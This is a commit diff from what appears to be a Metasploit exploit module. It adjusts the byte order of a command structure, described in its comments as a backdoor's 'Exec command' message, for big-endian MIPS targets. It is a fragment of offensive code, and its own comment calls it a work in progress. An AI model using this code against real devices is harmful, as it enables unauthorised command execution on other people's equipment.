Land #2872, switch for ARCH_MIPSBE
commit
804b26bac6
|
@ -109,7 +109,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# 0x53634d4d => Backdoor code
|
||||
# 0x07 => Exec command
|
||||
# cmd_length => Length of command to execute, sent after communication struct
|
||||
data = [0x53634d4d, 0x07, cmd_length].pack("VVV")
|
||||
# According to @mandreko, probably targets specifics must be had into account
|
||||
# when dealing with the target endiangess... work in progress
|
||||
if target.arch.include?(ARCH_MIPSBE)
|
||||
data = [0x4d4d6353, 0x07, cmd_length].pack("NVV")
|
||||
else
|
||||
data = [0x4d4d6353, 0x07, cmd_length].pack("VNN")
|
||||
end
|
||||
|
||||
connect
|
||||
# Send command structure followed by command text
|
||||
|
|
Loading…
Reference in New Issue